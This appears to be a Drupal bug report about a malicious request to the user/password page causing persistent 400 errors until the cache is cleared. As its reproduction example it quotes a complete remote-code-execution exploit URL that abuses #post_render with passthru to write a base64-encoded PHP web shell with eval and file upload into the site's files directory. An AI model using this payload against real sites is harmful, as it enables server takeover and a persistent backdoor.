Problem/Motivation
The error occurs when the cache is rebuilt and just after that the attempt to make the malicious request attempt to a Drupal-based website on the user/password page
The error is coming at the place of content of the page keeping header and footer.
The error can be replicated by hitting the following URL in the Browser:
https://example.com/user/password?name[%23post_render][0]=passthru&name%5B%23markup%5D=mv+-f+sites%2Fdefault%2Ffiles%2F.htaccess+sites%2Fdefault%2Ffiles%2F.hatccess%3Becho+PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFW2RdKT09IjE3MDI4ZjQ4N2NiMmE4NDYwNzY0NmRhM2FkMzg3OGVjIil7ZWNobyJvayI7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFtpZF0pKTtpZigkX1BPU1RbInVwIl09PSJ1cCIpe0Bjb3B5KCRfRklMRVNbImZpbGUiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSk7fX0%2FPg%3D%3D%7Cbase64+--decode%7Ctee+sites%2Fdefault%2Ffiles%2F99a51f380ecf.php
Steps to reproduce
1. Clear Site Cache.
2. Hit malicious URL with a query parameter, like ( URL: https://example.com/user/password?name[%23post_render][0]=passthru)
3. Getting Response 400 (A client error happened)
4. After that refresh the page or Hit the Right URL in another tab, like ( URL: https://example.com/user/password )
5. Getting response 400 (even after hitting the right URL)
This error can be resolved by clearing the cache again.
Error coming in the log is
Symfony\Component\HttpKernel\Exception\BadRequestHttpException: Input value "name" contains a non-scalar value. in Symfony\Component\HttpKernel\HttpKernel->handle() (line 83 of /var/www/html/vendor/symfony/http-kernel/HttpKernel.php).
